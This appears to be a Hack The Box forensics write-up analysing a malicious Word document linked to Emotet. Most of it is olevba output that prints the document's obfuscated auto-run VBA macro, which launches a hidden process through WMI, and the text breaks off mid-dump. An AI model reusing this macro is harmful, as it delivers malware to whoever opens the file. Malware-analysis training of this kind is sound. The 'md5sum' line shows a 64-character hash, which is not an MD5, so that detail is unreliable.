Home front-page port 80-shoopyu EMO | Hack The Box | Forensics
Post
Cancel

front-page port 80-shoopyu EMO | Hack The Box | Forensics

100 Day's Of Cybersecurity - Day 1

Challenge Description

WearRansom ransomware just got loose in our company. The SOC has traced the initial access to a phishing attack, a Word document with macros. Take a look at the document and see if you can find anything else about the malware and perhaps a flag.

Initial Forensics Analysis

CISA has an Page called -Emottet Malware that goes into detail about this malware, how it propogates, and how it functions. If we go to the bottom of that page it lists some attack techniques documented by MITRE. There are several techniques that are relevant to how I’ll approach this challenge:

  • Emotet has sent Microsoft Word documents with embedded macros that will invoke scripts to download additional payloads.
  • Emotet has obfuscated macros within malicious documents to hide the URLs hosting the malware, CMD.exe arguments, and PowerShell scripts.
  • Emotet has used cmd.exe to run a PowerShell script.
  • Emotet has used Powershell to retrieve the malicious payload and download additional resources like Mimikatz.

Investigating Malicious Documents

1
2
root@kali $ md5sum emo.doc
c578a9fc241658517a7346a2a60236c84f0bb4919b857db226150aab4093451e

Screenshot 2023-12-10 212832

You can also read the virus total comments / Community section to see the detaild analysis report by the community

Office documents can be Unzipped and have a ton of XML and metadata included.


There are tools that will analyze an Office doc to see if there are any macros, that SANS document lists a python script called Oledump that can extract macro data.

File Metadata

1
2
3
4
β”Œβ”€β”€(rootγ‰Ώkali)-[/home/kali/Desktop/challenge-files]
└─# file emo.doc                           
emo.doc: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Subject: Handmade Argentina Handcrafted Frozen Towels yellow Frozen virtual Guatemala array Lesotho JBOD, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Sat Oct 31 00:48:00 2020, Last Saved Time/Date: Tue Nov  3 02:14:00 2020, Number of Pages: 1, Number of Words: 9339, Number of Characters: 53237, Security: 8
        

Dumping Office Macros

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
β”Œβ”€β”€(rootγ‰Ώkali)-[/home/kali/Desktop/challenge-files]
└─# olevba emo.doc
olevba 0.60.1 on Python 3.11.6 - http://decalage.info/python/oletools
===============================================================================
FILE: emo.doc
Type: OLE
-------------------------------------------------------------------------------
VBA MACRO Dw75ayd2hpcab6.cls 
in file: emo.doc - OLE stream: 'Macros/VBA/Dw75ayd2hpcab6'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
Private Sub Document_open()
Get4ipjzmjfvp.X8twf_cydt6
End Sub
Function X4al3i4glox(Gav481k8nh28)
X4al3i4glox = Replace(Gav481k8nh28, "][(s)]w", Sxybmdt069cn)
End Function
-------------------------------------------------------------------------------
VBA MACRO Get4ipjzmjfvp.frm 
in file: emo.doc - OLE stream: 'Macros/VBA/Get4ipjzmjfvp'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
Function X8twf_cydt6()
On Error Resume Next
sss = Dw75ayd2hpcab6.StoryRanges.Item(1)
   Dim LIHXDt(7 + 7 + 1 + 7) As String
Set XaXiEc = (iskkZI)
Dim SnQXASH(7 + 7 + 1 + 8) As String
LIHXDt(tBPnJI) = (Sin(1) + 205 + 6595)
aDLglIF = GXOghGA
LIHXDt(tBPnJI + tBPnJI) = (aOTNpGFFJ + 5)
LIHXDt(tBPnJI + tBPnJI) = 7 + Oct(4) + pNmvqMOzY + CDbl(14) + (4 + LNEEDGz + molmtEGC + Cos(779))
Dim AJfXCG(5 + 6 + 1 + 5) As String
Set dVZiWDFGB = (eQyofECdH)
Dim wmHOBFDQ(5 + 8 + 1 + 6) As String
AJfXCG(LEwdAb) = (Sin(2) + 2 + 4791)
xQZPEUJc = YrnIBGI
AJfXCG(LEwdAb + LEwdAb) = (khBzHCG + 313)
AJfXCG(LEwdAb + LEwdAb) = 7 + Oct(3) + gmIUFwJG + CDbl(8911) + (271 + WwyPDJG + rPLnHwi + Cos(8))
E6qgao74pfq = "][(s" + ")]wro][(s)]w][(s)]wce][(s)]w" + "s][(s)]ws][(s)]w" + Xta0s1qhuxcif8qqi5
   Dim iITzHFPc(7 + 7 + 1 + 6) As String
Set JaxgAAHY = (oRmjC)
Dim XEXOGD(8 + 6 + 1 + 8) As String
iITzHFPc(XHFVEZI) = (Sin(8) + 5 + 8051)
NcVuqJG = WcJYJvH
iITzHFPc(XHFVEZI + XHFVEZI) = (LRdJJHBHD + 8)
iITzHFPc(XHFVEZI + XHFVEZI) = 9894 + Oct(9234) + bCPzCaJIa + CDbl(6) + (1 + fLVlPYdCB + wqYKEBEF + Cos(7119))
Dim DCTECB(6 + 6 + 1 + 4) As String
Set niqpCjFDA = (YCapJCq)
Dim nrNvREE(8 + 6 + 1 + 6) As String
DCTECB(eBMBDA) = (Sin(6) + 865 + 1)
FMpxY = WJKMHJHwg
DCTECB(eBMBDA + eBMBDA) = (QeFoJxC + 45)
DCTECB(eBMBDA + eBMBDA) = 6 + Oct(5) + DJchG + CDbl(78) + (6639 + mULNNfHA + WEkRFDo + Cos(3))
Op93rci3r56v3hsg = "][(s)]w][(s" + ")]w:][(s)]ww][(s)]win][(s)]w][(s)" + "]w3][(s)]w2][(s)]w_][(s)]w" + Jxjv2dzc048yq4alc6
   Dim rhGEXH(6 + 7 + 1 + 5) As String
Set VCutHNpQ = (sbyueQG)
Dim yVnFcAyf(6 + 7 + 1 + 7) As String
rhGEXH(ezhVYCDEH) = (Sin(2711) + 5 + 922)
fQjvIImF = KzxtIH
rhGEXH(ezhVYCDEH + ezhVYCDEH) = (lRdSO + 17)
rhGEXH(ezhVYCDEH + ezhVYCDEH) = 563 + Oct(8519) + omTHCD + CDbl(79) + (4 + EiDDm + jJguE + Cos(8))
Dim ZZtqYtHHF(8 + 6 + 1 + 8) As String
Set AXStgeFJ = (omtPzHDIH)
Dim YXFLBFI(7 + 6 + 1 + 7) As String
ZZtqYtHHF(kfSkHO) = (Sin(28) + 91 + 27)
SJUzsG = sKuFbE
ZZtqYtHHF(kfSkHO + kfSkHO) = (DDxjDP + 9440)
ZZtqYtHHF(kfSkHO + kfSkHO) = 3 + Oct(1914) + JELCJT + CDbl(58) + (1 + QLSVFfyT + MHVlDGdJR + Cos(6))
K8dgvsqr6fhbct6v = "][(s)]w][(s)]ww" + "][(s)]wi][(s)]wnm][(s)]w][(s)]" + "wgm][(s)]wt][(s)]w][(s)]w" + Jeo_8i41vkli6
   Dim YbriYJz(8 + 7 + 1 + 8) As String
Set RbinpE = (OfniM)
Dim TaahYEIJ(8 + 7 + 1 + 5) As String
YbriYJz(OxVPIIKHC) = (Sin(24) + 53 + 7569)
nrhaXCJ = LXNDCgC
YbriYJz(OxVPIIKHC + OxVPIIKHC) = (kKdXMAAFA + 55)
YbriYJz(OxVPIIKHC + OxVPIIKHC) = 17 + Oct(75) + bjZaA + CDbl(1) + (9063 + EoofKVZI + DdzEJ + Cos(65))
Dim hqYtBgCG(7 + 8 + 1 + 5) As String
Set aPFWgHDEC = (mJmdpA)
Dim XfkTuGBtD(8 + 6 + 1 + 8) As String
hqYtBgCG(ZdccFCG) = (Sin(51) + 2586 + 2)
nPdvTG = UosEDIDG
hqYtBgCG(ZdccFCG + ZdccFCG) = (GZuzCBBD + 462)
hqYtBgCG(ZdccFCG + ZdccFCG) = 7 + Oct(9) + eZANoxJEF + CDbl(462) + (1 + UfwtfF + ZqEnBDnz + Cos(7))
Jv2btd64ezie8rdyer = ChrW(wdKeyS)
   Dim IAfgHf(8 + 5 + 1 + 7) As String
Set ySEvH = (dPjSD)
Dim UCKMD(7 + 7 + 1 + 7) As String
IAfgHf(pbkxGAl) = (Sin(64) + 9310 + 36)
jnRKDfHGR = xQCmGFBcQ
IAfgHf(pbkxGAl + pbkxGAl) = (xHITFH + 9)
IAfgHf(pbkxGAl + pbkxGAl) = 9 + Oct(1) + DNCnGH + CDbl(8) + (2 + BAyRTA + vCVpAH + Cos(80))
Dim QcSsG(5 + 7 + 1 + 8) As String
Set bREjDuI = (xpDtBC)
Dim TCPatL(5 + 5 + 1 + 7) As String
QcSsG(MWhDgeFoD) = (Sin(11) + 4 + 970)
yxteyAHjD = pQBvJdCI
QcSsG(MWhDgeFoD + MWhDgeFoD) = (PrLzBhA + 140)
QcSsG(MWhDgeFoD + MWhDgeFoD) = 9 + Oct(3670) + ScqHd + CDbl(4) + (5662 + WovTAEU + WECuD + Cos(131))
Sd0hj_y8cq79n589qq = K8dgvsqr6fhbct6v + Jv2btd64ezie8rdyer + Op93rci3r56v3hsg + Get4ipjzmjfvp.Fwder3b7t4tqrecw + E6qgao74pfq
   Dim eMroy(7 + 8 + 1 + 8) As String
Set sCRHlln = (deZgZAIIJ)
Dim UrkCFaES(5 + 6 + 1 + 4) As String
eMroy(uantLBkI) = (Sin(2) + 6442 + 35)
zfnsDBBHC = HKVVHA
eMroy(uantLBkI + uantLBkI) = (iESFbQ + 40)
eMroy(uantLBkI + uantLBkI) = 68 + Oct(33) + kVLyjryf + CDbl(2) + (9 + BLtWQJ + yqlXFIPe + Cos(253))
Dim BTUuI(6 + 8 + 1 + 6) As String
Set YEYxCnAN = (ESQduGo)
Dim xocsPc(5 + 7 + 1 + 4) As String
BTUuI(mNOZEGRAY) = (Sin(5806) + 7 + 8)
EKqwAQBFb = TGBcB
BTUuI(mNOZEGRAY + mNOZEGRAY) = (rctZzI + 6)
BTUuI(mNOZEGRAY + mNOZEGRAY) = 3 + Oct(7313) + Rjuav + CDbl(5975) + (4 + ZKwHJAC + qtvGJj + Cos(734))
Amst4ijfvo1r0b5ium = I51m0kjl96lpdcfhm(Sd0hj_y8cq79n589qq)
   Dim RAQLJD(7 + 7 + 1 + 6) As String
Set XClJdM = (qlnJCHFGA)
Dim AyphQ(6 + 6 + 1 + 4) As String
RAQLJD(lhsUn) = (Sin(63) + 90 + 209)
QcoqUDJC = FTLUI
RAQLJD(lhsUn + lhsUn) = (KWBRJx + 649)
RAQLJD(lhsUn + lhsUn) = 37 + Oct(9) + kiCVHdO + CDbl(3) + (13 + JVsdIYZ + yWgfDMJ + Cos(1))
Dim cxCnFdBpH(5 + 5 + 1 + 5) As String
Set ouitJA = (BvjvBpF)
Dim irZVSAFEC(6 + 8 + 1 + 7) As String
cxCnFdBpH(WlIOJA) = (Sin(4585) + 7 + 1)
koqBS = lDEQYrNuX
cxCnFdBpH(WlIOJA + WlIOJA) = (RqPWyEUZ + 6)
cxCnFdBpH(WlIOJA + WlIOJA) = 5 + Oct(1694) + UQOJSE + CDbl(451) + (1970 + HNsVvpR + UGJiRH + Cos(677))
Set Rom9dzby5v3unv8 = CreateObject(Amst4ijfvo1r0b5ium)
   Dim xCJYS(8 + 8 + 1 + 4) As String
Set nUxoA = (ndgJxJ)
Dim dNstJJ(7 + 7 + 1 + 6) As String
xCJYS(lIIdsEnz) = (Sin(7) + 21 + 9823)
UqZyGgr = qgKhJhPy
xCJYS(lIIdsEnz + lIIdsEnz) = (KsNJFACB + 3841)
xCJYS(lIIdsEnz + lIIdsEnz) = 3315 + Oct(6099) + UbgTA + CDbl(3) + (2 + lTCbsIsF + GxXWH + Cos(3))
Dim duXHDX(5 + 8 + 1 + 5) As String
Set XAdCCJCDU = (wGHRsBA)
Dim OxZCo(8 + 5 + 1 + 6) As String
duXHDX(nTEhlAA) = (Sin(7) + 760 + 24)
ZXWDXr = vmNyd
duXHDX(nTEhlAA + nTEhlAA) = (NIoXO + 7502)
duXHDX(nTEhlAA + nTEhlAA) = 2 + Oct(7381) + IlwhBGGA + CDbl(64) + (73 + ssIEJuAZ + iumzCPBhV + Cos(9582))
Dbx3w8eu9966odzw7 = Mid(sss, 5, Len(sss))
   Dim iimCF(8 + 8 + 1 + 6) As String
Set cVbUEXH = (qQWMpPjJB)
Dim KbgyWgiy(6 + 8 + 1 + 5) As String
iimCF(ddFjcBZ) = (Sin(5) + 2 + 807)
NNUQCDF = EUOuI
iimCF(ddFjcBZ + ddFjcBZ) = (tliLDA + 73)
iimCF(ddFjcBZ + ddFjcBZ) = 9754 + Oct(684) + qzATa + CDbl(5439) + (3 + tPMKDxGQJ + lPrKBf + Cos(7))
Dim ZIPdEIE(7 + 5 + 1 + 8) As String
Set KhbFIAi = (pGIpm)
Dim QnvQJAvIt(6 + 8 + 1 + 5) As String
ZIPdEIE(dEIgCCLRg) = (Sin(5195) + 1 + 3)
LvpLmB = zhnZcwHAB
ZIPdEIE(dEIgCCLRg + dEIgCCLRg) = (FySxXAIH + 19)
ZIPdEIE(dEIgCCLRg + dEIgCCLRg) = 829 + Oct(214) + TxDmIs + CDbl(195) + (85 + TeLIDpFn + sPwas + Cos(9))
Gav481k8nh28 = Tvjy9j74xspx0wpf + Amst4ijfvo1r0b5ium + Jv2btd64ezie8rdyer + Get4ipjzmjfvp.Mvskm12if9c843w3 + Get4ipjzmjfvp.Cn8r2cg8i626ztt
   Dim CuHWH(5 + 6 + 1 + 8) As String
Set eZjuS = (hlQuF)
Dim lSHDSHO(5 + 5 + 1 + 4) As String
CuHWH(INihXISI) = (Sin(240) + 9382 + 6)
CeToYEFOJ = XhFNDAfH
CuHWH(INihXISI + INihXISI) = (diQIDMTEE + 9)
CuHWH(INihXISI + INihXISI) = 532 + Oct(1) + bSBYAD + CDbl(8) + (54 + dRJBFF + RKhWIioCG + Cos(1))
Dim rBbdCgGID(7 + 7 + 1 + 6) As String
Set CsfsEQDy = (tHWouERF)
Dim MFOOHtBHH(8 + 5 + 1 + 6) As String
rBbdCgGID(ZBEbaY) = (Sin(14) + 818 + 1)
xmcvJAB = unjRC
rBbdCgGID(ZBEbaY + ZBEbaY) = (hZKtHDYG + 2163)
rBbdCgGID(ZBEbaY + ZBEbaY) = 202 + Oct(2) + kxieI + CDbl(75) + (9 + VktznpCDE + xUImPFBRx + Cos(949))
Set Nzkctvs5ewy_ds = Iwfbtu1s0d782jz(Gav481k8nh28 + Get4ipjzmjfvp.Fwder3b7t4tqrecw)
   Dim uysVZGLE(6 + 7 + 1 + 8) As String
Set HrmgKC = (yFUaERwnM)
Dim DCXgo(6 + 7 + 1 + 7) As String
uysVZGLE(VODRro) = (Sin(5) + 5 + 7)
nADlCW = DxupENAFA
uysVZGLE(VODRro + VODRro) = (kYUTCCm + 8672)
uysVZGLE(VODRro + VODRro) = 486 + Oct(547) + wFXADzAJJ + CDbl(75) + (8 + EcWkCBWH + wjhXAJF + Cos(7))
Dim dhVACDD(6 + 7 + 1 + 6) As String
Set soSvHK = (wKOSWHJ)
Dim qUyfy(7 + 5 + 1 + 5) As String
dhVACDD(LfyOFtG) = (Sin(30) + 4 + 254)
nyhPC = QpscekG
dhVACDD(LfyOFtG + LfyOFtG) = (lzcwGnM + 17)
dhVACDD(LfyOFtG + LfyOFtG) = 9 + Oct(86) + cIngGbFIE + CDbl(38) + (1 + eznxDGC + WPWWJDJ + Cos(6))
   Dim tuGlEMNUH(6 + 8 + 1 + 8) As String
Set pFgxtjm = (PTyGIAEHE)
Dim hullICDx(8 + 6 + 1 + 5) As String
tuGlEMNUH(akUPoTFvY) = (Sin(1474) + 8 + 819)
KpZdJ = lYvceWGew
tuGlEMNUH(akUPoTFvY + akUPoTFvY) = (fBhoIR + 4)
tuGlEMNUH(akUPoTFvY + akUPoTFvY) = 56 + Oct(3031) + GTYmh + CDbl(5) + (27 + yqAQE + aIkGEC + Cos(258))
Dim KgVqvF(7 + 7 + 1 + 4) As String
Set dyYfmEW = (euDCT)
Dim ZFRdGCtu(7 + 6 + 1 + 7) As String
KgVqvF(HmjZbHGBE) = (Sin(5) + 7 + 3)
FBCpGGZJ = pMeqBMo
KgVqvF(HmjZbHGBE + HmjZbHGBE) = (bdxXMNBG + 6)
KgVqvF(HmjZbHGBE + HmjZbHGBE) = 9 + Oct(95) + QOBnPkFc + CDbl(13) + (114 + kyBDET + MlSxCzI + Cos(1))
   Dim crVtKHQWB(5 + 6 + 1 + 5) As String
Set zdGjPIC = (kUBBICmD)
Dim EBxxC(6 + 7 + 1 + 8) As String
crVtKHQWB(lUoRYN) = (Sin(587) + 435 + 8)
EwbcHIpDH = QJVOHPEF
crVtKHQWB(lUoRYN + lUoRYN) = (gfcPAE + 13)
crVtKHQWB(lUoRYN + lUoRYN) = 31 + Oct(1851) + mqutET + CDbl(164) + (73 + wotoAG + QNruXSC + Cos(6))
Dim YRgECF(8 + 7 + 1 + 7) As String
Set jrSuN = (asSvxGC)
Dim jmlTEGEHD(8 + 5 + 1 + 6) As String
YRgECF(rsLfMDHRI) = (Sin(1234) + 871 + 601)
urCBGDI = LPZGqW
YRgECF(rsLfMDHRI + rsLfMDHRI) = (WKBwIIx + 80)
YRgECF(rsLfMDHRI + rsLfMDHRI) = 8819 + Oct(158) + irqNf + CDbl(5) + (9 + SsmqieBVT + kFfqC + Cos(526))
Rom9dzby5v3unv8. _
Create AWLDFu7C7y(I51m0kjl96lpdcfhm(Dbx3w8eu9966odzw7)), Kw8r40ymn9ne3xu, Nzkctvs5ewy_ds
   Dim CpULFB(5 + 5 + 1 + 7) As String
Set axAfIEGRA = (QROQHnVJ)
Dim QHdoB(8 + 5 + 1 + 5) As String
CpULFB(TrBpFI) = (Sin(8) + 657 + 23)
xSnpcJCH = gtlfI
CpULFB(TrBpFI + TrBpFI) = (lsdYGbJFn + 638)
CpULFB(TrBpFI + TrBpFI) = 9806 + Oct(724) + uHfXN + CDbl(932) + (7 + sbFHIIArH + sxbtG + Cos(28))
Dim usrCDU(8 + 8 + 1 + 4) As String
Set sHuwpJH = (gWJfc)
Dim YxEfjGJ(5 + 8 + 1 + 4) As String
usrCDU(WMDxGNE) = (Sin(7) + 742 + 600)
DvEdpD = tvUMTQF
usrCDU(WMDxGNE + WMDxGNE) = (ybnwoB + 4617)
usrCDU(WMDxGNE + WMDxGNE) = 789 + Oct(98) + RkTnG + CDbl(3) + (4 + GyKLzEF + NLKIdFC + Cos(3))
   Dim fvJsBBDU(5 + 6 + 1 + 5) As String
Set dmUGJtEIO = (uydmCpg)
Dim FclRuzDG(5 + 8 + 1 + 6) As String
fvJsBBDU(HymnRVRE) = (Sin(6) + 37 + 3598)
YkQZHhJH = WpwcG
fvJsBBDU(HymnRVRE + HymnRVRE) = (qljYKHo + 385)
fvJsBBDU(HymnRVRE + HymnRVRE) = 3 + Oct(3) + xrYfDFtK + CDbl(5) + (89 + hIjOfJ + RPNhCwDC + Cos(6))
Dim qQldIhoCE(8 + 8 + 1 + 5) As String
Set rHlNGA = (xOzmLO)
Dim pNdhI(5 + 6 + 1 + 6) As String
qQldIhoCE(loWUokjFC) = (Sin(9987) + 2 + 220)
RvbYFFAfH = IUzlJJ
qQldIhoCE(loWUokjFC + loWUokjFC) = (etSoIE + 1)
qQldIhoCE(loWUokjFC + loWUokjFC) = 57 + Oct(3) + PrkTCejb + CDbl(207) + (8 + MRAMjOPB + uGpbAu + Cos(9740))
End Function
Function Iwfbtu1s0d782jz(Wvnulte_7rd74l873)
On Error Resume Next
   Dim ouUhFGIGf(5 + 7 + 1 + 5) As String
Set RlxSfHAYF = (JDFYIEIER)
Dim NAFGBBt(7 + 6 + 1 + 5) As String
ouUhFGIGf(VvufD) = (Sin(1912) + 9 + 32)
aLEvBtsA = yiBOhGPHC
ouUhFGIGf(VvufD + VvufD) = (SpCZJgIbx + 1)
ouUhFGIGf(VvufD + VvufD) = 47 + Oct(2) + JKDmHJ + CDbl(5) + (3 + ycwsIG + xFozEoBTm + Cos(4))
Dim vfVAC(7 + 7 + 1 + 7) As String
Set kWFWBISu = (FtcKEFcG)
Dim zPozC(7 + 7 + 1 + 8) As String
vfVAC(XSBMFAXy) = (Sin(5) + 7 + 804)
faeGBD = QiOaCJf
vfVAC(XSBMFAXy + XSBMFAXy) = (uOKtFrCB + 60)
vfVAC(XSBMFAXy + XSBMFAXy) = 1 + Oct(505) + kOXeC + CDbl(8) + (9 + ZxfmTDAmT + DMLyG + Cos(9))
Set Iwfbtu1s0d782jz = Rk3572j7tam4v8.Y5ruq1pwxek1348fi(I51m0kjl96lpdcfhm(A1h3yevqvs8 + Wvnulte_7rd74l873 + Hkhlqz9x9h9xvlv))
   Dim eMynDvEG(7 + 8 + 1 + 4) As String
Set bosZTe = (ZHQRDVvED)
Dim SCxUDgXHF(7 + 7 + 1 + 6) As String
eMynDvEG(qsaqdCD) = (Sin(481) + 2486 + 61)
KNHer = DzVJD
eMynDvEG(qsaqdCD + qsaqdCD) = (QVKICAHGC + 1)
eMynDvEG(qsaqdCD + qsaqdCD) = 63 + Oct(843) + rhVSHHA + CDbl(1) + (1840 + FDakJyDA + ZdugFEBSS + Cos(6))
Dim hblBI(8 + 6 + 1 + 4) As String
Set cRTStDFB = (jzfrAO)
Dim lDyKI(7 + 5 + 1 + 6) As String
hblBI(xRdCB) = (Sin(10) + 9219 + 9)
rNbDIAUS = tmRgDDGE
hblBI(xRdCB + xRdCB) = (oVNifh + 9)
hblBI(xRdCB + xRdCB) = 9 + Oct(79) + lClHEe + CDbl(115) + (688 + VbMPGQ + rqzDD + Cos(1))
Iwfbtu1s0d782jz.XSize = 0
Iwfbtu1s0d782jz.YSize = 0
   Dim fRjdFCIm(6 + 5 + 1 + 8) As String
Set yMhIFMGD = (kkoDI)
Dim mRxAL(8 + 6 + 1 + 4) As String
fRjdFCIm(XhxlCSmJE) = (Sin(46) + 8 + 484)
ocTFGCAM = ZNLRD
fRjdFCIm(XhxlCSmJE + XhxlCSmJE) = (xpdUDHB + 8)
fRjdFCIm(XhxlCSmJE + XhxlCSmJE) = 1 + Oct(36) + phOaIiI + CDbl(6) + (5 + fimLiVBCE + irpLx + Cos(4))
Dim POgWDiUG(6 + 7 + 1 + 8) As String
Set aZZkJIA = (zxAAItq)
Dim PoLDI(5 + 8 + 1 + 6) As String
POgWDiUG(qBxkBh) = (Sin(7745) + 80 + 289)
ZZaOlHYa = UsWoBEn
POgWDiUG(qBxkBh + qBxkBh) = (OlOXGbk + 1)
POgWDiUG(qBxkBh + qBxkBh) = 8870 + Oct(5) + lnibY + CDbl(46) + (570 + fOpUYSC + VZimy + Cos(329))
End Function
Function I51m0kjl96lpdcfhm(St7625txnot)
On Error Resume Next
   Dim nIMomJ(7 + 5 + 1 + 8) As String
Set mwiaJCwY = (LvplXHH)
Dim bCxOZBGJR(6 + 6 + 1 + 8) As String
nIMomJ(lQahnH) = (Sin(2) + 29 + 904)
XwJoHQ = swDDEHEDy
nIMomJ(lQahnH + lQahnH) = (GQkQDQf + 9)
nIMomJ(lQahnH + lQahnH) = 20 + Oct(3) + tATQD + CDbl(66) + (82 + DHKVEjKIS + UBGVGJDD + Cos(8048))
Dim FkCoHp(8 + 7 + 1 + 4) As String
Set fNdLD = (lXCHyAEv)
Dim ZNsIEB(5 + 5 + 1 + 6) As String
FkCoHp(LSiwbWHo) = (Sin(493) + 778 + 25)
SqrRClQBm = jZAcJp
FkCoHp(LSiwbWHo + LSiwbWHo) = (ScUjHHSkX + 6)
FkCoHp(LSiwbWHo + LSiwbWHo) = 66 + Oct(6) + ZWRjGgE + CDbl(280) + (8 + kbqbLIIH + RxjoHFC + Cos(9))
Swa7jh9qx56op58nf = (St7625txnot)
   Dim UmkRIEu(5 + 6 + 1 + 8) As String
Set jYQSjI = (JVnNDbnpC)
Dim ZWgajTo(7 + 7 + 1 + 7) As String
UmkRIEu(okgKdGCG) = (Sin(822) + 3 + 3)
wzVsH = bPaVhJDH
UmkRIEu(okgKdGCG + okgKdGCG) = (LCaMAWCHk + 934)
UmkRIEu(okgKdGCG + okgKdGCG) = 9047 + Oct(2543) + XuuEfCwWA + CDbl(7) + (9 + TFDpDAx + TpHsk + Cos(2))
Dim qwjsHJcH(7 + 5 + 1 + 7) As String
Set bjNVAA = (ymTUHIABF)
Dim XrdSyMG(8 + 5 + 1 + 8) As String
qwjsHJcH(sxcyGH) = (Sin(697) + 928 + 7)
VRTbBsA = TpZMxj
qwjsHJcH(sxcyGH + sxcyGH) = (BUIACDGtC + 9)
qwjsHJcH(sxcyGH + sxcyGH) = 3 + Oct(3493) + iFRnr + CDbl(3) + (8 + ShbgyJGE + luZZRJ + Cos(78))
Sxhaen2_r4b3crptm = Dw75ayd2hpcab6.X4al3i4glox(Swa7jh9qx56op58nf)
   Dim kdscDErj(7 + 6 + 1 + 4) As String
Set aFfpGp = (hjRTZNDGJ)
Dim zqVkuHu(6 + 7 + 1 + 6) As String
kdscDErj(BElQC) = (Sin(5) + 6 + 354)
SZbrtCp = qZHeJAD
kdscDErj(BElQC + BElQC) = (inMTLGJ + 5)
kdscDErj(BElQC + BElQC) = 86 + Oct(93) + RtKSEXETs + CDbl(237) + (2 + dwBsFG + MOwHB + Cos(2))
Dim rHyLrgvAP(6 + 8 + 1 + 6) As String
Set lscaa = (qlYFWCFA)
Dim gbwak(6 + 8 + 1 + 5) As String
rHyLrgvAP(QpIaAorpF) = (Sin(512) + 8702 + 83)
FmoXED = RQQNg
rHyLrgvAP(QpIaAorpF + QpIaAorpF) = (TTSBDUcC + 3)
rHyLrgvAP(QpIaAorpF + QpIaAorpF) = 5 + Oct(4) + iThYS + CDbl(3) + (5510 + TtcmHO + KPifuU + Cos(846))
I51m0kjl96lpdcfhm = Sxhaen2_r4b3crptm
   Dim blXJIk(6 + 5 + 1 + 8) As String
Set rqhtP = (lOtlxlA)
Dim aQkjA(6 + 8 + 1 + 4) As String
blXJIk(KWpQoCS) = (Sin(8) + 3 + 250)
fLSrFg = VAfNIJ
blXJIk(KWpQoCS + KWpQoCS) = (YkcHHEu + 8)
blXJIk(KWpQoCS + KWpQoCS) = 3 + Oct(6) + sDzaU + CDbl(6) + (1491 + zzzqCZHH + RERUEDBAD + Cos(3))
Dim qpTXy(5 + 5 + 1 + 8) As String
Set mOTdDDIJ = (vWqBlKEj)
Dim kvQxfB(5 + 8 + 1 + 6) As String
qpTXy(krBPlqzJ) = (Sin(84) + 186 + 6)
RCDZe = FyehtVb
qpTXy(krBPlqzJ + krBPlqzJ) = (WiRYhFfQ + 2144)
qpTXy(krBPlqzJ + krBPlqzJ) = 13 + Oct(1) + oyRjRH + CDbl(8) + (7 + WzEZBS + caPLFkOJl + Cos(5822))
End Function
Function T34b0j5rffcr(Ny676u98ho9ja)
Xlcdcd2bzdz8f4 = Pgmtj98xbz1mkec2y
End Function
Function AWLDFu7C7y(AMUjF5h4uz)
On Error Resume Next
Dim qpTXy(5 + 5 + 1 + 8) As String
Dim kvQxfB(5 + 8 + 1 + 6) As String
qpTXy(krBPlqzJ) = (Sin(84) + 186 + 6)
RCDZe = FyehtVb
qpTXy(krBPlqzJ + krBPlqzJ) = (WiRYhFfQ + 2144)
qpTXy(krBPlqzJ + krBPlqzJ) = 13 + Oct(1) + oyRjRH + CDbl(8) + (7 + WzEZBS + caPLFkOJl + Cos(5822))
AWLDFu7C7y = Mid(AMUjF5h4uz, 1, 50)
Dim UmkRIEu(5 + 6 + 1 + 8) As String
Set jYQSjI = (JVnNDbnpC)
Dim ZWgajTo(7 + 7 + 1 + 7) As String
UmkRIEu(okgKdGCG) = (Sin(822) + 3 + 3)
wzVsH = bPaVhJDH
UmkRIEu(okgKdGCG + okgKdGCG) = (LCaMAWCHk + 934)
UmkRIEu(okgKdGCG + okgKdGCG) = 9047 + Oct(2543) + XuuEfCwWA + CDbl(7) + (9 + TFDpDAx + TpHsk + Cos(2))
For i = 51 To Len(AMUjF5h4uz) Step 2
Dim dhVACDD(6 + 7 + 1 + 6) As String
Set soSvHK = (wKOSWHJ)
AWLDFu7C7y = AWLDFu7C7y & Mid(AMUjF5h4uz, i, 1)
Dim qUyfy(7 + 5 + 1 + 5) As String
dhVACDD(LfyOFtG) = (Sin(30) + 4 + 254)
nyhPC = QpscekG
dhVACDD(LfyOFtG + LfyOFtG) = (lzcwGnM + 17)
dhVACDD(LfyOFtG + LfyOFtG) = 9 + Oct(86) + cIngGbFIE + CDbl(38) + (1 + eznxDGC + WPWWJDJ + Cos(6))
Next i
Dim IAfgHf(8 + 5 + 1 + 7) As String
